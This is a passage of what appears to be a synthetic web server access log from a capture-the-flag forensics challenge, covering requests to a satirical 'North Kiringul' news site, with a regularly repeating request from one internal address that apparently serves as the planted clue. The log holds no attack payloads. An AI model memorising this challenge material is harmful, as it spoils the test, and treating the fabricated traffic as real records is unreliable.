"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +167.231.57.213 - - [23/Jul/2020:11:50:30 -0500] "GET / HTTP/1.1" 200 6657 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +49.22.163.16 - - [23/Jul/2020:11:50:32 -0500] "GET /loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 400 10578 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +130.113.28.55 - - [23/Jul/2020:11:50:34 -0500] "POST /north-kiringul-missile-program/ HTTP/1.1" 200 3503 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +77.26.105.23 - - [23/Jul/2020:11:50:37 -0500] "GET / HTTP/1.1" 200 3151 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +90.98.188.184 - - [23/Jul/2020:11:50:38 -0500] "GET /en/soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 13479 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +161.161.231.98 - - [23/Jul/2020:11:50:41 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 3162 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +247.225.85.153 - - [23/Jul/2020:11:50:43 -0500] "GET /ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 403 3323 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +166.161.17.73 - - [23/Jul/2020:11:50:44 -0500] "GET /en/ HTTP/1.1" 200 10775 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +18.183.9.145 - - [23/Jul/2020:11:50:47 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 5445 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +118.165.210.231 - - [23/Jul/2020:11:50:48 -0500] "GET /en/ HTTP/1.1" 200 6779 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +212.195.13.98 - - [23/Jul/2020:11:50:51 -0500] "POST /99-problems/ HTTP/1.1" 200 4882 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +223.66.29.113 - - [23/Jul/2020:11:50:52 -0500] "GET /en/kim-jong-fun/ HTTP/1.1" 200 2505 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" +80.200.126.178 - - [23/Jul/2020:11:50:55 -0500] "GET / HTTP/1.1" 200 2831 "-" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" +192.168.51.66 - - [23/Jul/2020:11:50:57 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +180.115.239.131 - - [23/Jul/2020:11:50:59 -0500] "GET /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 11457 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +3.138.248.178 - - [23/Jul/2020:11:51:01 -0500] "GET /en/ HTTP/1.1" 200 8668 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +241.86.41.232 - - [23/Jul/2020:11:51:02 -0500] "GET / HTTP/1.1" 500 12154 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +238.64.162.248 - - [23/Jul/2020:11:51:05 -0500] "POST /en/nuke-the-chinese/ HTTP/1.1" 200 9555 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +40.33.105.86 - - [23/Jul/2020:11:51:09 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.0" 200 13873 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" +203.212.13.76 - - [23/Jul/2020:11:51:10 -0500] "GET /en/art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 6761 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +37.175.104.68 - - [23/Jul/2020:11:51:12 -0500] "POST /en/kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 11798 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +70.48.143.13 - - [23/Jul/2020:11:51:16 -0500] "POST /en/fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 5622 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +140.245.61.13 - - [23/Jul/2020:11:51:20 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.0" 200 8778 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +162.59.102.30 - - [23/Jul/2020:11:51:21 -0500] "GET /en/song-we-are-the-happiest-in-the-world/ HTTP/1.0" 200 3098 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +227.170.204.96 - - [23/Jul/2020:11:51:25 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 11950 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" +119.216.97.234 - - [23/Jul/2020:11:51:26 -0500] "POST /en/dancing-parties-held/ HTTP/1.1" 200 10726 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +204.194.199.116 - - [23/Jul/2020:11:51:28 -0500] "POST /en/kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 304 2600 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +239.210.212.55 - - [23/Jul/2020:11:51:29 -0500] "POST / HTTP/1.1" 200 14774 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +35.20.30.169 - - [23/Jul/2020:11:51:30 -0500] "GET /en/new-kind-of-flowerpot-invented/ HTTP/1.1" 400 13808 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +6.183.130.31 - - [23/Jul/2020:11:51:31 -0500] "POST /en/many-medical-scientific-achievements-made/ HTTP/1.1" 200 14108 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +203.116.44.34 - - [23/Jul/2020:11:51:32 -0500] "GET /en/distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 6913 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +200.139.248.111 - - [23/Jul/2020:11:51:35 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 9409 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +76.7.137.187 - - [23/Jul/2020:11:51:39 -0500] "GET /phyongchon-pickle-factory/ HTTP/1.1" 301 2313 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +48.179.82.39 - - [23/Jul/2020:11:51:40 -0500] "GET /new-kind-of-flowerpot-invented/ HTTP/1.1" 404 8954 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +57.1.40.126 - - [23/Jul/2020:11:51:44 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 9916 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +228.210.176.64 - - [23/Jul/2020:11:51:48 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 10819 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +149.190.228.158 - - [23/Jul/2020:11:51:50 -0500] "POST /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 12259 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" +183.96.193.86 - - [23/Jul/2020:11:51:53 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 2390 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" +84.20.200.223 - - [23/Jul/2020:11:51:55 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 9118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +178.55.18.172 - - [23/Jul/2020:11:51:57 -0500] "POST / HTTP/1.1" 200 3547 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +192.168.51.66 - - [23/Jul/2020:11:51:58 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +97.150.8.225 - - [23/Jul/2020:11:51:58 -0500] "POST /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 6338 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +86.174.241.148 - - [23/Jul/2020:11:52:02 -0500] "POST /quality-waterproof-liquid-made/ HTTP/1.1" 200 2802 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +138.179.211.96 - - [23/Jul/2020:11:52:05 -0500] "GET / HTTP/1.1" 200 12219 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +150.194.248.24 - - [23/Jul/2020:11:52:09 -0500] "GET /en/north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.0" 403 12565 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +45.41.222.23 - - [23/Jul/2020:11:52:13 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 304 3912 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" +152.214.69.174 - - [23/Jul/2020:11:52:15 -0500] "GET / HTTP/1.1" 200 9318 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +194.197.39.91 - - [23/Jul/2020:11:52:18 -0500] "GET /latest-rocket/ HTTP/1.1" 200 13957 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +205.42.56.251 - - [23/Jul/2020:11:52:19 -0500] "POST / HTTP/1.1" 200 9646 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +48.193.151.41 - - [23/Jul/2020:11:52:22 -0500] "GET /ultimate-technology/ HTTP/1.1" 500 10956 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:30.0) Gecko/20100101 Firefox/30.0" +73.164.217.53 - - [23/Jul/2020:11:52:23 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 7043 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +29.239.153.54 - - [23/Jul/2020:11:52:27 -0500] "GET /en/nuke-the-chinese/ HTTP/1.1" 200 14181 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" +192.168.51.66 - - [23/Jul/2020:11:52:28 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +5.236.44.6 - - [23/Jul/2020:11:52:30 -0500] "POST /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.1" 500 5783 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +4.47.54.104 - - [23/Jul/2020:11:52:32 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 3551 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +187.118.229.75 - - [23/Jul/2020:11:52:36 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 2975 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +239.228.151.39 - - [23/Jul/2020:11:52:37 -0500] "GET /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 5896 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +178.152.229.19 - - [23/Jul/2020:11:52:41 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 14894 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +219.254.241.91 - - [23/Jul/2020:11:52:42 -0500] "GET /latest-rocket/ HTTP/1.1" 500 4960 "http://www.nkcna.ctf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +232.24.51.24 - - [23/Jul/2020:11:52:46 -0500] "POST /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 7442 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +112.9.8.199 - - [23/Jul/2020:11:52:49 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.0" 200 13919 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +39.241.73.194 - - [23/Jul/2020:11:52:53 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 200 11238 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" +140.71.200.43 - - [23/Jul/2020:11:52:54 -0500] "GET /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 14601 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +81.108.162.101 - - [23/Jul/2020:11:52:56 -0500] "GET /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 13544 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +88.124.147.156 - - [23/Jul/2020:11:52:57 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 12771 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +218.2.198.212 - - [23/Jul/2020:11:52:58 -0500] "GET /en/pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 301 3274 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:52:58 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +80.121.102.215 - - [23/Jul/2020:11:53:00 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 400 6649 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +216.245.168.135 - - [23/Jul/2020:11:53:01 -0500] "GET /en/many-medical-scientific-achievements-made/ HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +123.141.178.192 - - [23/Jul/2020:11:53:05 -0500] "GET / HTTP/1.1" 200 14878 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +240.16.221.144 - - [23/Jul/2020:11:53:09 -0500] "GET /en/3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 2853 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +237.211.175.141 - - [23/Jul/2020:11:53:10 -0500] "GET /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 11770 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +13.220.77.200 - - [23/Jul/2020:11:53:12 -0500] "GET /en/floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 400 5784 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +168.102.27.176 - - [23/Jul/2020:11:53:16 -0500] "GET /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 200 2042 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +24.223.220.44 - - [23/Jul/2020:11:53:20 -0500] "GET /en/loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 8309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +15.123.58.104 - - [23/Jul/2020:11:53:22 -0500] "GET / HTTP/1.1" 200 13490 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0" +42.156.60.180 - - [23/Jul/2020:11:53:24 -0500] "GET /en/kumdang-2-injection-manufactured/ HTTP/1.1" 200 7209 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +84.17.67.132 - - [23/Jul/2020:11:53:26 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.1" 200 14650 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +53.70.155.121 - - [23/Jul/2020:11:53:27 -0500] "POST / HTTP/1.1" 200 4867 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:53:28 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +236.16.209.251 - - [23/Jul/2020:11:53:31 -0500] "GET /sudoku/ HTTP/1.1" 200 4299 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +39.46.198.153 - - [23/Jul/2020:11:53:32 -0500] "GET /dancing-parties-held/ HTTP/1.0" 200 8673 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0" +188.39.59.65 - - [23/Jul/2020:11:53:34 -0500] "POST /en/many-medical-scientific-achievements-made/ HTTP/1.1" 200 8761 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +141.230.223.65 - - [23/Jul/2020:11:53:36 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 400 7098 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +85.29.185.128 - - [23/Jul/2020:11:53:40 -0500] "GET /en/kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +87.148.52.17 - - [23/Jul/2020:11:53:44 -0500] "GET /new-national-record-set-in-archery/ HTTP/1.1" 200 10779 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100 Safari/537.36" +232.43.24.212 - - [23/Jul/2020:11:53:45 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 403 2912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +239.12.162.84 - - [23/Jul/2020:11:53:46 -0500] "POST / HTTP/1.1" 200 14065 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +189.244.12.91 - - [23/Jul/2020:11:53:47 -0500] "POST /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 7816 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +29.131.7.43 - - [23/Jul/2020:11:53:49 -0500] "GET /deep-pan-or-classic/ HTTP/1.1" 200 7047 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +13.53.74.127 - - [23/Jul/2020:11:53:51 -0500] "GET /kim-jong-fun/ HTTP/1.0" 200 8047 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +159.193.254.128 - - [23/Jul/2020:11:53:55 -0500] "POST /en/ HTTP/1.1" 200 7769 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +146.112.165.104 - - [23/Jul/2020:11:53:58 -0500] "GET /sudoku/ HTTP/1.1" 200 7779 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +192.168.51.66 - - [23/Jul/2020:11:53:58 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +201.251.63.111 - - [23/Jul/2020:11:54:00 -0500] "GET /en/new-national-record-set-in-archery/ HTTP/1.1" 200 13442 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +124.57.215.6 - - [23/Jul/2020:11:54:01 -0500] "GET /ultimate-technology/ HTTP/1.1" 200 3074 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" +227.182.173.20 - - [23/Jul/2020:11:54:02 -0500] "GET /new-books-published-in-dprk/ HTTP/1.1" 200 9198 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +139.191.244.21 - - [23/Jul/2020:11:54:04 -0500] "POST /north-kiringul-air-force/ HTTP/1.1" 400 6156 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +141.115.49.84 - - [23/Jul/2020:11:54:08 -0500] "GET /en/sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.0" 200 10683 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" +166.14.47.159 - - [23/Jul/2020:11:54:10 -0500] "GET / HTTP/1.1" 200 13689 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +251.29.155.182 - - [23/Jul/2020:11:54:12 -0500] "GET /kim-jong-fun/ HTTP/1.1" 200 4736 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +130.189.13.227 - - [23/Jul/2020:11:54:14 -0500] "GET /phyongchon-pickle-factory/ HTTP/1.1" 200 14580 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +201.168.57.181 - - [23/Jul/2020:11:54:16 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 14733 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +193.56.167.41 - - [23/Jul/2020:11:54:19 -0500] "GET /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 8384 "http://www.google.ctf" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" +7.51.52.179 - - [23/Jul/2020:11:54:21 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.0" 200 12604 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/14D27 Safari/602.1" +17.78.190.7 - - [23/Jul/2020:11:54:24 -0500] "POST /en/dancing-parties-held/ HTTP/1.1" 404 7258 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +247.179.231.176 - - [23/Jul/2020:11:54:27 -0500] "GET /en/first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 200 2523 "-" 